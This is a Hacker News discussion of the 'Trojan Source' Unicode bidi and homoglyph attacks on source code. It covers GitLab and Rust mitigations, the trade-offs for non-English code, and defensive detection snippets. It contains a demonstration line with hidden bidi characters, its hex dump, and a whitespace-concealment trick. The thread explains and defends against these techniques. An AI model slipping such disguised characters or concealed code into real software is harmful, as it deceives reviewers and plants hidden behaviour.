‘Trojan Source’ Bug Threatens the Security of All Code (krebsonsecurity.com)
494 points by picture 82 days ago | 271 comments

This was a pretty interesting thing to mitigate - we added some support around it to GitLab after it was reported to us, which shipped in the latest security release: https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57... (you can actually see it in effect on that commit's examples, which is quite meta). These characters have valid use-cases in right-to-left languages like Arabic, Japanese etc, so it had to be configurable for project-owners if they have legitimate use-cases for it. Our focus was on making sure that repository maintainers could see these characters in code reviews.

The homoglyph attack is interesting but it really should be noticed as part of a code review process, as it requires adding the imitation function calls at some point too. It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.

It's certainly a good lesson in not copy/pasting random snippets from the internet and pasting them into a root shell, however :D (we do always highlight the bidi characters on GitLab snippets, though)

Aside: this was a royal pain in the arse to figure out if I had live examples in the specs, because vim also just rendered them "correctly". I ended up checking the files in Windows Notepad on another machine to sanity check them.

Thanks to the authors for responsible disclosure.

> It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.

That actually strikes me as very desirable. (Especially in light of the old maxim that "programs must be written for people to read, and only incidentally for machines to execute".)

Those Unicode characters aren't just there for show. They're part of real scripts that real people use; it would be annoying for people using those scripts.

I'm fairly sure this could be arranged for. As in, if there's too many of them belonging to the character set of a particular language, then it's very likely that it's simply a text in that language. But random characters in the middle of ASCII identifiers are probably not something that you want.

Yeah I'm not opposed to adding highlighting to them, and we are investigating how to do it, but it was less clear-cut than the bidi characters (which are totally invisible when rendered). I think we'll want to make it a bit more configurable and probably a separate option to the one which highlights the bidi characters.

Exactly. When we were adding support for non-ASCII identifiers to Rust, and thinking about homoglyphs and confusable characters, we needed to evaluate the tradeoffs between catching such characters and inconveniencing the speakers of various languages who want to write Rust in their language.

This type of attack isn't new. I can't recall the names but there are afair multiple C/C++ coding standards that limit everything to ASCII to avoid precisely this attack, but also others with visually similar but nonequivalent names.

Yes, and they should be in well annotated/marked string/data sections, not in logic code.

Latin C and Cyrillic С aren't the same letter. The latter is actually an "s". It would be a pain in the ass to work with strings if those Cyrillic letters that look like their Latin counterparts reused their codepoints. Imagine having to convert "M" to lowercase. Would that return "m" or "м"? Same for "H", "h" or "н"?
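
To make the casing point concrete, here is a minimal Python sketch (Python is just my pick for illustration, and the variable names are made up). It only relies on the standard `unicodedata` module and shows that the two lookalike capitals are separate code points, so each one lowercases unambiguously.

```python
import unicodedata

latin_m = "M"            # U+004D LATIN CAPITAL LETTER M
cyrillic_em = "\u041c"   # U+041C CYRILLIC CAPITAL LETTER EM, renders like "M"

for ch in (latin_m, cyrillic_em):
    lower = ch.lower()
    print(
        f"U+{ord(ch):04X} {unicodedata.name(ch)} -> "
        f"U+{ord(lower):04X} {unicodedata.name(lower)}"
    )

# Because the code points are distinct, the lowercase results never collide.
lowered_differ = latin_m.lower() != cyrillic_em.lower()
```

If the two letters shared one code point, `lower()` would have to guess which alphabet was meant.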

And, actually, there was some really really cursed Soviet encoding that did this to save bits. The Russian railway company still uses it[1] to this day.

[1] https://habr.com/ru/post/547820/

> there was some really really cursed Soviet encoding

I know at least 10 stories that start like this

> Latin C and Cyrillic С aren't the same letter.

Well, as a moderately old Czech, I'm somewhat familiar with Cyrillic. They kind of used to force it on us in schools.

> this was a royal pain in the arse to figure out if I had live examples in the specs, because vim also just rendered them "correctly"

That's because vim has supported Farsi/Arabic natively from day one. Even if the OS does not support it, you can still write bidirectional and right-to-left text in vim. Never knew the reason, but thanks Bram Moolenaar.

I was impatient to find the example you were talking about; as far as I can tell, this is the line with the example: https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...

And here's what it looks like in various conditions/viewers:

With the fix, this is how it looks in the browser in the Gitlab interface:

    if (accessLevel != "user�") {� // Check if admin ��
Without the fix, viewed raw (and thus viewed in a vulnerable way), it looks like this:

    if (accessLevel != "user") { // Check if admin
And in a hex viewer, it looks like this:

    000005b0: 2020 2020 2020 2069 6620 2861 6363 6573         if (acces
    000005c0: 734c 6576 656c 2021 3d20 2275 7365 72e2  sLevel != "user.
    000005d0: 80ae 20e2 81a6 2f2f 2043 6865 636b 2069  .. ...// Check i
    000005e0: 6620 6164 6d69 6ee2 81a9 20e2 81a6 2229  f admin... ...")
    000005f0: 207b 0a20 2020 2020 2020 2020 2020 2020   {.
    00000600: 2063 6f6e 736f 6c65 2e6c 6f67 2822 596f   console.log("Yo
    00000610: 7520 6172 6520 616e 2061 646d 696e 2e22  u are an admin."
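
For anyone who wants to check the dump without squinting at hex, here is a small Python sketch. The bytes are copied from the dump above (from `if` through `") {`); the variable names are mine. It decodes them as UTF-8 and lists every character in the Unicode "format" category (`Cf`), which is where the bidi controls live.

```python
import unicodedata

# Bytes copied from the hex dump, starting at "if" and ending at ') {'.
raw = bytes.fromhex(
    "6966 2028 6163 6365 73"
    "734c 6576 656c 2021 3d20 2275 7365 72e2"
    "80ae 20e2 81a6 2f2f 2043 6865 636b 2069"
    "6620 6164 6d69 6ee2 81a9 20e2 81a6 2229"
    "207b"
)
text = raw.decode("utf-8")

# Collect (index, code point, name) for every invisible format character.
found = [
    (i, f"U+{ord(ch):04X}", unicodedata.name(ch))
    for i, ch in enumerate(text)
    if unicodedata.category(ch) == "Cf"
]
for entry in found:
    print(entry)
```

The `e2 80 ae`, `e2 81 a6` and `e2 81 a9` sequences in the dump are the UTF-8 encodings of U+202E, U+2066 and U+2069 respectively.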

That's a great example ^ that demonstrates exactly how this vulnerability can be easily abused

I was intrigued by your meta example and I took a look. It took me 3-4 minutes to find the warning, and I was looking for it!

I was expecting a big fat warning on the merge request itself, or maybe on the lines containing the dangerous chars.

In the end, it is a small ? character inserted where the unicode control chars are, and a mouseover tooltip warning about a potential issue.

The warning is good, but why so subtle? Sorry for the criticism. The feature is still a huge positive.

Thanks for the feedback! Our primary use-case when deciding on it was to flag these up in a code-review situation, to prevent malicious content being submitted in merge requests to unsuspecting projects. We found this made it stand out enough to the reviewer when performing code reviews. I also try to not be too quick to add new alerts or sections to the GUI as we sometimes get criticised for having too much clutter D:

GitHub by comparison went down the alert banner route, from what I can see. I'm not opposed to adding something to that effect as well though - especially for inexperienced reviewers, it would be nice to include some more information about the potential exploit. That could be something we revisit when we add the homoglyph highlighting.

Thus, one sloppy review by that known tired-in-the-mornings dev, "sure thing, looks like Java..", and your little marking is missed?

I personally wish that in repos with the warning enabled, that the �s were displayed in lieu of the malicious characters instead of in addition to them. For example, I'd rather see this:

          var accessLevel = "user";
          if (accessLevel != "user� �// Check if admin� �") {
              console.log("You are an admin.");
than this:

          var accessLevel = "user";
          if (accessLevel != "user�") {� // Check if admin�� 
              console.log("You are an admin.");

Is that possible to do using CSS with our existing markup? Currently we prepend the � using ::before. I imagine we could probably hide the existing character and shuffle the � over where it should be, but it might need some testing across different text sizes I imagine. I'll make a note of it for our next revision :)

I don't think what I want is possible with a pure-CSS solution, but I'm not 100% sure.

> It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.

Have you tried something similar to what the browsers do where highlighting is only enabled when there are multiple scripts mixed within the same token? Source code seems like it would be harder since you have many tokens rather than just a single one as in a hostname, and I'd be curious how much legitimate usage mixes scripts for technical reasons because you have something like a language or framework convention that certain names start with a particular English-derived term.
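
A rough Python sketch of the per-token idea, to show how little it takes to prototype. Big assumption: Python's standard library has no script property, so this guesses the script from the first word of each character's Unicode name (`LATIN`, `CYRILLIC`, ...). That is a heuristic I made up for illustration, not what browsers actually do, and the function names are hypothetical.

```python
import re
import unicodedata


def scripts_in(token: str) -> set[str]:
    """Approximate the set of scripts used by the letters in one token."""
    scripts = set()
    for ch in token:
        if ch.isalpha():
            name = unicodedata.name(ch, "")
            if name:
                # Heuristic: "CYRILLIC SMALL LETTER ES" -> "CYRILLIC"
                scripts.add(name.split()[0])
    return scripts


def mixed_script_tokens(source: str) -> list[str]:
    """Return the word-like tokens whose letters come from more than one script."""
    return [tok for tok in re.findall(r"\w+", source) if len(scripts_in(tok)) > 1]


# "a\u0441\u0441ess" spells "access" with two Cyrillic letters in the middle.
sample = "if (a\u0441\u0441ess != user) { привет(); }"
flagged = mixed_script_tokens(sample)
```

A token written entirely in one script (like `привет`) is left alone, which is the property that keeps this from being noisy for non-English code.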

So far we're just detecting individual bidi characters, but looking at characters in their greater context could be quite interesting. This would seem like quite a good use-case for machine-learning too, if you wanted to get super into it.

> It's certainly a good lesson in not copy/pasting random snippets from the internet and pasting them into a root shell, however

I gotta say that I always make sure that I understand each piece of code that I copy paste but I do copy paste and never thought of this type of attack. Maybe that's something I should pay attention to in the future.

from the article, it's likely you'd not even notice - unless you pasted in an ascii only editor that doesn't allow anything other than plain old text.

> It's certainly a good lesson in not copy/pasting random snippets from the internet...

For someone with more gumption than me:

Future copy & paste will by default have intermediate screenshot and OCR steps. Voila: charset scrubbing for free.

Why not? Already today misc UIs and renderings disallow text selection. Drives me nuts.

The future is now. Android has been doing this for years and it's awesome. There's no text you can't copy.

To clarify, by default copy and paste works the normal way, but you can open the app switcher to use the OCR copy/paste which works on non-selectable text too, even in images.

There's a way to prevent this - to my great annoyance, health apps (such as the ubiquitous MyHealth variants) and banking apps can prevent you from taking screenshots or copying text. This is presumably to prevent screen-scraping apps from stealing your private data, but it's really annoying when you're trying to screenshot a QR code for some kind of check-in process.

That's why you need a second phone to photograph the screen of the first phone.

If you root your phone, you can use an Xposed module like DisableFlagSecure to get around apps that do that.

This is too complicated for a personal supercomputer to be burdened with. Better to ship everything on the clipboard to a sanitizer service.

>These characters have valid use-cases in right-to-left languages like Arabic, Japanese etc,

I've never seen it used for Japanese. I don't think there is a valid use case for Japanese.

Ah yes you're right - looks like that can be handled with CSS: https://www.w3.org/International/articles/vertical-text/. Although from what I've seen most Japanese websites tend to be left-to-right instead anyway.

Hebrew would be a more valid second example I think. I'd be curious to know how many languages maintain their RTL preference online.

Japanese¹ isn't a right to left language, exactly. It can be written horizontally, in which case it's L-R, top to bottom, or, vertically, in which case it's top to bottom, with columns running R-L, but functionally, this is still like L-R typesetting, just with the characters rotated 90° CCW and the pages are then read in the same order as pages in a R-L book. This is typical of manga which is why there might have been confusion by the OP about the directionality of Japanese.


1. All of this also applies to Chinese and Korean. Interestingly, traditional Mongolian script is also written vertically, but in columns left to right rather than right to left.

This doesn't feel particularly new either? Isn't it pretty much a new variant of https://github.com/reinderien/mimic ?

Which, if one is suspicious of code, can be defeated in vim with: set encoding=latin1

Which breaks other things, such as every other string that's not written in English. But it's a great tip for a quick check, thanks! (Much more convenient than piping text through xxd)

Yeah, it's definitely just for quick checks if the text is in fact using unicode. But, hopefully just for stuff you're suspicious of where you could mandate no-unicode.
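
If you'd rather not touch your editor settings, the same kind of quick check can be done from a Python prompt. A minimal sketch: the built-in `ascii()` returns the repr of a string with every non-ASCII character escaped, so invisible characters show up as `\u....` sequences. The sample line is the one from the GitLab example; the variable names are mine.

```python
# The suspicious line, with the bidi controls written as explicit escapes.
suspicious = 'if (accessLevel != "user\u202e \u2066// Check if admin\u2069 \u2066") {'

# ascii() escapes anything outside ASCII, so nothing can hide in the output.
escaped = ascii(suspicious)
print(escaped)

# A plain-ASCII line comes back unchanged apart from the surrounding quotes.
clean = ascii('if (accessLevel != "user") {')
```

Like the vim trick, this is only for eyeballing something you already distrust.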

As I previously noted on a related post:

Interesting paper. Note, however, that the general problem is already known and there are a number of pre-existing works that discuss it. This is typically called "underhanded code" or sometimes "maliciously misleading code". I'm surprised that they didn't use the normal term for the problem nor cite the previous work on it - maybe they didn't realize this was a widely-known problem? Previous works on underhanded code didn't discuss Bidi to my knowledge (though other attacks on text like this have exploited Bidi). Here are a number of other materials about underhanded code:

The Obfuscated V Contest (http://graphics.stanford.edu/~danielh/vote/vote.html) was created by Daniel Horn in 2004 and is the earliest “underhanded” programming contest that I found. It was a contest to create source code that looked like it did one thing, but actually did another.

Underhanded C Contest (http://www.underhanded-c.org/) has run for many years. Per its FAQ, "The Underhanded C Contest is an annual contest to write innocent-looking C code implementing malicious behavior."

My PhD dissertation "Fully Countering Trusting Trust through Diverse Double-Compiling" discusses how to counter the "trusting trust" problem & includes a section about maliciously misleading source code. See: https://dwheeler.com/trusting-trust/

The JavaScript Misdirection Contest announced the winner on September 27, 2015 http://misdirect.ion.land/

My paper "Initial Analysis of Underhanded Source Code", (by David A. Wheeler, April, 2020, IDA document: D-13166), discusses underhanded code and the effectiveness of several potential countermeasures. It also includes a number of citations to other works on underhanded code. https://www.ida.org/research-and-publications/publications/a...

First place winner of last year's underhanded Solidity contest used exactly this trick: https://blog.soliditylang.org/2020/12/03/solidity-underhande...

There was a related issue in 2018 regarding line endings, which would allow disguising some lines as code while keeping them as comments: https://docs.google.com/document/d/1PZBSCBWBwd6AqWCgXqLnw8FN...

Both of these were fixed in Solidity shortly after the bug reports.

(P.S. I'm a member of the Solidity team)

This is a great treasure trove of deep Solidity trivia. Thanks for the link!

It's also worth noting that if you're caught playing games like this, there is really no way to explain your actions that would avoid serious consequences.

If however, you used the "bugdoor" method, you can plausibly deny any malicious intent and you will absolutely get away with it.

Oldest trick in the book:

    /* Legitimate comment.        <a lot of white space to go off screen> */ #define malicious code
Nobody will notice the horizontal scroll bar.

Except your IDE and CI should rightfully complain about lines of 160+ characters. That's one of the real reasons for this rule, not just "fits on the screen nicely".
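
The kind of check meant here fits in a few lines. A hedged Python sketch, with a made-up function name and the 160-character limit taken from the comment above; a real project would normally get this from its linter rather than hand-rolling it.

```python
def overlong_lines(source: str, limit: int = 160) -> list[tuple[int, int]]:
    """Return (line number, length) for every line longer than `limit`."""
    return [
        (number, len(line))
        for number, line in enumerate(source.splitlines(), start=1)
        if len(line) > limit
    ]


# The "oldest trick": push the payload off screen with padding inside a comment.
hidden = "/* Legitimate comment." + " " * 200 + "*/ #define malicious code"
sample = "int x = 0;\n" + hidden + "\n"

report = overlong_lines(sample)
```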

That often fails. E.g., Vim has line wrap on by default so you would still see the text.

> Cambridge research clearly shows that most compilers can be tricked with Unicode into processing code in a different way than a reader would expect it to be processed.

Unless I misunderstand the premise, this is not right. The compiler is not "tricked" into doing anything different - it interprets the code the same way as it always did. It's like saying "rm" command "can be tricked into" deleting important files. The rm tool doesn't know which files are important to you, and the compiler doesn't - and shouldn't - know what you consider to be "correct" code. It would correctly compile any code that is syntactically correct - if there are strings inside that look weird to you, it doesn't matter to the compiler.

The entity that can be "tricked" here is the reviewer of the code - who, indeed, might probably be tricked into accepting code that does something different than they'd think it does (though it'd require a very clever attacker for the code to both do something nefarious with Unicode and still look innocent and not weird to the reviewer). Fortunately, this is quite easy to fix - just don't accept any patches with source code that have any non-ASCII outside small set of localization resources (proper code would have localizable resources outside the code anyway, tbh) and no Unicode would ever trick you.

> Fortunately, this is quite easy to fix - just don't accept any patches with source code that have any non-ASCII outside small set of localization resources

There are plenty of projects out there written by people who aren't English speakers who depend on the Unicode capabilities of languages to write code that is actually readable to them. Turning that off is far from a solution.

Does anyone actually do that in a production code?

I myself am not native English speaker and use unicode when writing in my mother tongue, but in 20+ years of programming I've never seen anyone using non-ascii chars in their professionally written code? Of course, you use the language in localization files, and perhaps in comments occasionally - especially in TODO stuff that's not meant to be permanent - but not in the actual code, like e.g. for a variable or function names.

I'd actually consider it a bad idea, as it limits significantly who can manage that code in the future.

It's a very western / Anglosphere attitude, and I think you underestimate how much code is produced in e.g. China and Japan nowadays, with comments in their native language.

How would you name a FooBarWicket if you don't speak a word of English?

I mean don't get me wrong, ideally everybody writes code in perfect English and sticks to a set of ~50 ascii characters, but it's not an ideal world and you have to keep other languages and cultures in mind.

I would argue that even if you decide that you are using some other language and not English, there is only a well-defined subset of Unicode characters that should ever be allowed in the codebase. Bidi override control characters are clearly not among them, whichever language you choose.

> Bidi override control characters are clearly not among them, whichever language you choose.

Not sure how would you write a comment in an RTL human language in the middle of LTR code without it. Lots of people learn to write RTL languages well before writing any code.

What compilers can do is to process those characters and assign them semantic value that makes the code equivalent to what is expected to be rendered.

Now, bidi overrides in identifier names is a nightmare I’d prefer to avoid.

You do not actually need the bidi override control character to put a comment in an RTL language in the middle of LTR code.

You only need it if you are doing this and the default Unicode algorithm for guessing LTR/RTL boundaries gets it wrong, so you need to override it with an explicit bidi override control. I'm not even sure how feasible that is in the editor/IDE environments that developers with this use case might use.

I am genuinely curious how often these sorts of situations come up in actual development.

> What compilers can do is to process those characters and assign them semantic value that makes the code equivalent to what is expected to be rendered.

I don't understand what you mean or how that's even possible, for the kinds of attacks discussed in OP.

Btw here's proof. Here is ltr text and rtl עִברִית text عربي interspersed with no bidi override control characters to be found.

Unicode can handle this, it has a heuristic algorithm for it. Note how if you try to select the text character-by-character, your selection does funny things at the rtl to ltr boundaries, because the byte order doesn't match the order on the screen. It really is handling the directionality changes, with the letters entered in "order" across changes, there is no funny entry or ordering going on, this is plain old normal unicode handling interspersed directionality changes just fine, with no bidi overrides.

It just sometimes gets it wrong for the intent of the author. Especially when there are characters at the boundaries that are themselves not strongly associated as rtl or ltr (like ordinary "western arabic numerals" or punctuation). That's what the bidi override control char is for.
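
You can see the "strongly" versus "weakly" directional distinction directly in the character database. A small Python sketch using the standard `unicodedata.bidirectional()` lookup; the sample string and variable names are made up.

```python
import unicodedata

# Latin letters, Hebrew letters, Arabic letters, digits and punctuation.
sample = "ab \u05e2\u05d1 \u0639\u0631 12 !"

# Map each distinct character to its bidirectional class.
classes = {ch: unicodedata.bidirectional(ch) for ch in sample}
for ch, bidi_class in classes.items():
    print(f"U+{ord(ch):04X} {bidi_class}")

# The explicit controls from the attack have classes of their own.
override_class = unicodedata.bidirectional("\u202e")  # RIGHT-TO-LEFT OVERRIDE
isolate_class = unicodedata.bidirectional("\u2066")   # LEFT-TO-RIGHT ISOLATE
```

Letters come back as `L`, `R` or `AL` (strong), while digits, spaces and punctuation come back as weak or neutral classes such as `EN`, `WS` and `ON`, which is why the algorithm has to infer their direction from context.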

The same way as you write a comment in a LTR human language in the middle of RTL code - you don't. You stick to either LTR or RTL. This is code, not prose.

Code is meant to be read and, occasionally, executed. Comments are usually ignored by compilers and are targeted towards humans.

> Not sure how would you write a comment in an RTL human language

Siht ekil.

> there is only a well-defined subset of Unicode characters that should ever be allowed in the codebase

It's not even remotely well-defined, and probably never will be. Also, as long as we keep adding to unicode, you will need to keep your whitelist of code points updated.

You can however find a well-defined subset of characters that can be allowed.

In either case you'd be essentially excluding entire languages.

You misunderstood my point:

>> There is only ... that should ever be allowed...

What I am saying is that if someone decides to code in a non-English language (which is completely reasonable), they should define a subset of Unicode characters that is acceptable. Additionally, the allowed characters should not permit tricks like these.
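
Roughly what I have in mind, as a Python sketch. Everything project-specific here is an assumption for illustration: the policy (printable ASCII plus the Cyrillic block), the names, and the report format. The only fixed part is that the explicit bidi controls are rejected regardless of which ranges a project picks.

```python
# Explicit bidi embedding/override/isolate controls: never acceptable in source.
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")

# Hypothetical project policy: printable ASCII and the Cyrillic block.
ALLOWED_RANGES = [(0x20, 0x7E), (0x0400, 0x04FF)]
ALLOWED_EXTRA = {"\t"}


def disallowed(source: str) -> list[tuple[int, int, str]]:
    """Return (line, column, code point) for each character outside the policy."""
    bad = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            in_policy = ch in ALLOWED_EXTRA or any(
                low <= ord(ch) <= high for low, high in ALLOWED_RANGES
            )
            if ch in BIDI_CONTROLS or not in_policy:
                bad.append((lineno, col, f"U+{ord(ch):04X}"))
    return bad


ok_report = disallowed('имя = "user"\n')
bad_report = disallowed('x = "user\u202e"')
```

The list of ranges is the part each team would argue about; the bidi set is not.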

As for excluding entire languages... well, yes. This is already the case today. But OTOH it's not like understanding what "if" means gives you any special advantage in programming.

Well, what you call an Anglosphere attitude is a reality of learning in a majority of non-english speaking countries: There's simply not enough resources for learning in your own language.

China is huge so I can see how it could work for them, but I still have to admit it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way, so they can handle at least the documentation and stay in a loop on new tech coming out all the time. It's not anything new as a concept, nor I see it as damaging for local cultures in any way - back in my University days I've learned myself some Russian so that I could read their physics and chemistry books which were excellent and way cheaper and easier for me to get than those from the West. One day I'll have no problem learning some Chinese if (or more likely when?) they become the referent source of knowledge.

> China is huge so I can see how it could work for them, but I still have to admit it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way,

Having worked with some large software teams in China my experience was that most people could speak a bit of English (but generally didn't want to) and were nowhere near at the level needed to actually design and write software in English.

If we forced them to do everything in English quality was terrible and everything took ages, but if we let them write in Mandarin things were much better.

> it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way, so they can handle at least the documentation and stay in a loop on new tech coming out all the time.

Why would they need to learn English to do those things? I'm sure there are Chinese-language tech news sites, and Chinese-language documentation.

When you code for yourself, write what you want. If you write to collaborate then use English/ASCII. Imagine international aviation if they allowed the same BS that people in IT allow and now even try to promote - everyone talking their own language and not understanding each other - we would have planes colliding and crashing all over the place.

We used to have that, with exactly the result you describe. Which is why it was changed.

We’ll get there eventually with software, but it generally doesn’t kill people so there’s less incentive.

Aviation requires real-time communication; it's not a great analogy, I don't think.

Agreed, but I'm still curious (and don't know the answer) how often someone actually needs to put a "Bidi override" in a comment... if I were a language designer I'd be tempted to just say they aren't allowed in comments or identifiers or anywhere but string literals/data, and have the compiler/interpreter just reject it.

(I have used a bidi override before myself, for non-malicious purposes!)

> anywhere but string literals/data

The examples [0] posted in this thread have the bidi characters inside a string literal.

[0] https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...

I'm not sure what they are being posted as examples of there? Can a bidi char in a string literal be successfully used in the sort of attack in the OP, a "Trojan Source" attack?

If so, that is devious!

It's not clear to me if those examples show that though. They show bidi characters being highlighted in a string literal, right?

My hypothesis was that such could not be part of a "trojan source" attack... but this stuff is confusing and I could have it wrong?
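
One way to test the hypothesis, as a Python sketch. My understanding (an assumption, not something the linked commit states) is that the trouble comes from controls that are still "open" when the literal ends, so their visual effect spills past the closing quote. The checker below just counts openers and closers; the names are hypothetical and the pairing is simplified compared with the full Unicode bidi algorithm.

```python
EMBED_OPENERS = set("\u202a\u202b\u202d\u202e")  # LRE, RLE, LRO, RLO
EMBED_POP = "\u202c"                             # PDF
ISOLATE_OPENERS = set("\u2066\u2067\u2068")      # LRI, RLI, FSI
ISOLATE_POP = "\u2069"                           # PDI


def has_unterminated_bidi(text: str) -> bool:
    """True if any embedding/override or isolate is still open at the end."""
    embeds = isolates = 0
    for ch in text:
        if ch in EMBED_OPENERS:
            embeds += 1
        elif ch == EMBED_POP:
            embeds = max(0, embeds - 1)
        elif ch in ISOLATE_OPENERS:
            isolates += 1
        elif ch == ISOLATE_POP:
            isolates = max(0, isolates - 1)
    return embeds > 0 or isolates > 0


# Contents of the string literal from the example, per the hex dump in this thread.
literal = "user\u202e \u2066// Check if admin\u2069 \u2066"
# A literal that opens an isolate around Hebrew text and closes it again.
balanced = "abc \u2067\u05e9\u05dc\u05d5\u05dd\u2069 def"

literal_is_open = has_unterminated_bidi(literal)
balanced_is_open = has_unterminated_bidi(balanced)
```

On the example literal, both the override and the last isolate are left open when the closing quote arrives, which would be consistent with the reordering leaking into the code after the string.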

> How would you name a FooBarWicket if you don't speak a word of English?

How would you learn how to make a FooBarWicket without knowing a word of English? Any programming language's control constructs are almost by definition English.

I still wonder though, just how much production non-comment source code is not written in the ASCII character set.

The libraries of most programming languages (developed in the west) are in ASCII - frameworks and middleware too. Have people in countries like Japan and China actually translated all of that code - renaming functions, classes, and variable names to their native tongue in Unicode - or do they just learn the English names (they are all nouns/pronouns and at most simple phrases so translation should not be too difficult; they don’t have to understand English grammar).

Microsoft translated all the commands in the scripting language for Excel into the native language, making it totally impossible to use for anyone. You can't even google it because the help is so split up across different languages.

Not only the commands, the separator too. In some languages, it's FUNCTION(arg1, arg2), in some others it's FONCTION(arg1; arg2)

Ah yes, Swedish was one of those languages I think. I can't imagine a worse thing to do with a programming language...

> Does anyone actually do that in a production code?

Would you accept teaching code as production code? Specifically, if you were to teach programming to young non English speakers, wouldn't you accept them to use words of their native tongue for variables and such?

> I'd actually consider it a bad idea, as it limits significantly who can manage that code in the future.

Wouldn't you say that solely using roman letters in code would impose a similar limit? In countries where these letters are seldom used (like for instance greek letters in western countries), only those accustomed to them would be able to handle code (as it has been the case until the last decade perhaps).

I can attest that it happens, even in (natural) languages that use Latin scripts. Sure, "just use en.US-ASCII" is a mitigation, and most (Euroamerican) code follows this; the bug extends to string literals however ("they don't end where you see them // this is actually not part of the string; return;"), so a different approach is needed.

Professionally made GUI software needs Unicode even when English localized, for typography.

Proper quotes, proper dashes (ASCII doesn't have a dash character, it only has minus), non-breakable space, soft hyphen, € character, Greek letters like π and μ, etc.

Most of these should be in a separate file for i18n, not directly in the source code.

Internationalization is not limited to putting strings into a table in resource. It also needs non-trivial amount of code. Printing numbers into strings is code not data. Yet if you want the numbers to look good, like "600 μm" or "6×10⁻⁴ meters", you gonna have Unicode in code, not the resources.

Another thing, not every software needs i18n. Depends on the market. I'm yet to see a C++ compiler which would localize their output messages.

“Meters” is an English word, and a string like “600 μm” should still probably be extracted from the code as “%d μm.”

Still, there are also strings like “6·10⁻⁴”
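
To illustrate both sides of this exchange, a short Python sketch (function names are made up). The unit label can live in a template that could be extracted to a resource file, but building the superscript exponent is logic, and that logic needs the non-ASCII characters somewhere in code.

```python
# Translation table from ASCII digits and minus to their superscript forms.
SUPERSCRIPTS = str.maketrans("-0123456789", "⁻⁰¹²³⁴⁵⁶⁷⁸⁹")


def format_sci(value: float) -> str:
    """Format a number as mantissa×10^exponent using superscript digits."""
    mantissa, exponent = f"{value:e}".split("e")
    superscript = str(int(exponent)).translate(SUPERSCRIPTS)
    return f"{float(mantissa):g}×10{superscript}"


def format_micrometres(value: int, template: str = "%d μm") -> str:
    """Format a length; the template is the part that could be externalized."""
    return template % value


small = format_sci(6e-4)
length = format_micrometres(600)
```

Even if `template` moves into a resource table, the `SUPERSCRIPTS` mapping stays in the source.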

GCC supports localization, that's one C++ compiler.

Intel C++ compiler seems to have a Japanese version (not tried).

I've definitely seen it done, in both code I was adjacent to and code I was pulling from outside. I have vivid memories of stumbling on a lib doing seemingly what I needed but with all comments in Chinese and variables/funcs in Pinyin.

Can you give an example? I've never seen a project (outside domains on APL, etc.) that seriously relied on any Unicode capabilities in the code itself (again, I am not talking about localized strings). My native language is not English, I've worked with people all over Europe, China, India, Japan, Israel, etc. - there are a lot of exciting i18n/l10n problems but I have never seen much of what a compiler would need to be concerned with.

> The rm tool doesn't know which files are important to you, and the compiler doesn't - and shouldn't - know what you consider to be "correct" code.

This is actually no longer true. Many rm implementations today prevent you from deleting a path including the root directory, unless you explicitly specify `--no-preserve-root`. Similarly, a lot of compilers tend to warn you or outright stop if they detect code that is very likely to be buggy - the rust compiler warning about these control characters is just the latest example.

Of course, in theory, each tool should do its job and the user should be the boundary to know what's right. In practice, though, these heuristics tend to catch bugs-to-be 95% of the time (at least in my experience) and are easily disabled otherwise, so they are good to have.

I couldn't care less about my root directory. The only things I care about are the motherboard firmware and the /home directory, and nothing prevents `rm` from deleting those.

The `--one-file-system` or `--preserve-root=all` flags are more useful than `--preserve-root`, but they're not defaults. (For a good reason: compatibility.)

You argue away your own fix. The proposed fix is like limiting rm to files outside of /sys; plenty of projects depend on the standardized behavior.

APL developers would disagree.

For people that spend their days reviewing APL code, the concerns of mere mortals are not important.

Security advisory for the Rust programming language (with a nice explanation): https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html

Rust 1.56.1 will be released later today.

> To assess the security of the ecosystem we analyzed all crate versions ever published on crates.io (as of 2021-10-17), and only 5 crates have the affected codepoints in their source code, with none of the occurrences being malicious.

Preview of the new helpful error: https://i.imgur.com/pGpZOnr.png

Their advisory is well-written and explains the problem well. The example code they use:

  if access_level != "user" { // Check if admin
opens up a whole can of worms though. You don't need cunning invisible control codes to break that line, you could just replace any of the letters in 'user' with a different, but almost-identical looking unicode symbol and you'd still have an exploit. Even better, this would be a completely deniable attack ("oops, I must have accidentally pressed alt-R while typing that letter" excuse) - whereas explaining away why you checked in some magical RTL/LTR encodings and hacked up a comment is impossible. Plus, it would render well in far more apps, terminals, command line programs, etc etc

> you could just replace any of the letters in 'user' with a different, but almost-identical looking unicode symbol and you'd still have an exploit.

The post mentions that exploit (and Rust's already existing defense) in the appendix.

Here are the details, as explained in a previous post:

> The compiler will warn about potentially confusing situations involving different scripts. For example, using identifiers that look very similar will result in a warning.

    warning: identifier pair considered confusable between `s` and `s`

> warning: identifier pair considered confusable

Note that the lint you mention is about identifiers, while "user" is a literal. The lint does not fire for literals. String literals have supported non-ASCII characters since 1.0.0, and there has never been a lint for them until now, with the 1.56.1 release.

Also worth noting that the homoglyph attack isn't linted for in literals or comments, only the bidi codepoints are.

> The compiler will warn about potentially confusing situations involving different scripts. For example, using identifiers that look very similar will result in a warning.

Unfortunately, I've little experience of rust, so I don't have experience of that warning. It would certainly help catch a one-liner exploit, but wouldn't it be excessively noisy for code written in non-english languages?

It only warns if there actually are two identifiers that look similar. Even if it's not malicious it's still confusing and is worth renaming.

But if you want to, turning off specific warnings for a file or block of code is really simple in rust, just add "#[allow(confusable_idents)]"

The Unicode homoglyph lint will only trigger if there are multiple identifiers that can look the same, it's not a blanket warning on anything that isn't ASCII. It's close to what browsers do with domain names. And you can always allow lints.
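To make the "only fires when two identifiers collide" behaviour concrete, here is a minimal Python sketch. It is not rustc's implementation: `TOY_CONFUSABLES`, `skeleton` and `confusable_pairs` are hypothetical names, and the table is a tiny hand-written stand-in for the full Unicode confusables data.

```python
from itertools import combinations

# Hypothetical, deliberately tiny table. A real check would use the full
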